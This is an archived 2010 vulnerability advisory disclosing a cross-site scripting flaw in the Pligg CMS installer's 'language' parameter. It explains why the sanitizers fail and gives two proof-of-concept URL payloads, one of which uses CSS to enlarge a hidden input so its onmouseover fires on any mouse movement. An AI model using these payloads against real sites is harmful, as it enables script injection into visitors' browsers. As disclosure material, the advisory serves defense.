AOH :: HP Unsorted P :: B1A-1427.HTM

Pligg Installation File XSS Vulnerability



Pligg Installation File XSS Vulnerability
Pligg Installation File XSS Vulnerability




Title: Pligg Installation File XSS Vulnerability
Vendor: Pligg
Product: Pligg CMS
Tested Version: 1.0.4
Threat Class: XSS
Severity: Medium
Remote: yes
Local: no
Discovered By: Andrei Rimsa Alvares

===== Description ====
Pligg is prone to a XSS vulnerability in the installation file: install/install1.php. The variable "language" - obtained from an http request - can be manipulated to execute java script code via onmouseover like functions. Even with the two sanitizers used (strip_tags and addslashes) it is possible to bypass the double quote jail of the value field in the input tag by passing a double quote via the "language" variable.

----- install/install1.php -----
20: 
----- install/install1.php -----

The sanitizer strip_tags prevents new tags to be used (like

) but it does not filter onmouseover type attacks. Addslashes inserts backslashes to escape special characters like double quote=2C but since html does not process escape sequences this sanitizer is useless to prevent breaking the double quote jail - regardless of magic_quotes is enabled or not.

===== Impact ====
Malicious java script code can be executed in the context of the affected web site.

===== Proof of Concept ====
A simple proof of concept demonstrating the double quote jail by passing is shown below. However=2C this attack is not exploitable because the input field is hidden.

http://target/install/install1.php?language=%22%20onmouseover=alert()%3E 

To overcome this limitation and provided a real case attack scenario=2C we used a technique obtained from [1]. This attack attempts to increase the area of the affected input field to cover the whole screen. Once the mouse is moved anywhere on the screen=2C the onmouseover java script can be triggered to execute the malicious code. In this proof of concept=2C an alert containing the message "XSS" should be shown on the screen in case of mouse movement.

http://target/install/install1.php?language=%22%20style=a:b=3Bmargin-top:-1000px=3Bmargin-left:-100px=3Bwidth:4000px=3Bheight:4000px=3Bdisplay:block=3B%20onmouseover=alert%28String.fromCharCode%2888=2C83=2C83%29%29=3B%3E 

This attack venue exploited in this proof of concept had no effect on Google Chrome web browser=2C but was successfully exploited on Mozilla Firefox and others.

===== Workaround ====
Remove the installation directory after installation=2C as recommended during installation.

===== Disclosure Timeline ====
June=2C 16 2010 - Vendor notification.
June=2C 22 2010 - Vendor replied but did not acknowledge the bug.
June=2C 22 2010 - New contact attempted to provide more details about the bug.
July=2C 07 2010 - No vendor reply. Public disclosure.

===== References ====
1. http://www.packetstormsecurity.org/papers/bypass/workaround-xss.txt 
2. http://www.pligg.com 
_________________________________________________________________
Hotmail: Powerful Free email with security by Microsoft.
https://signup.live.com/signup.aspx?id=60969

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.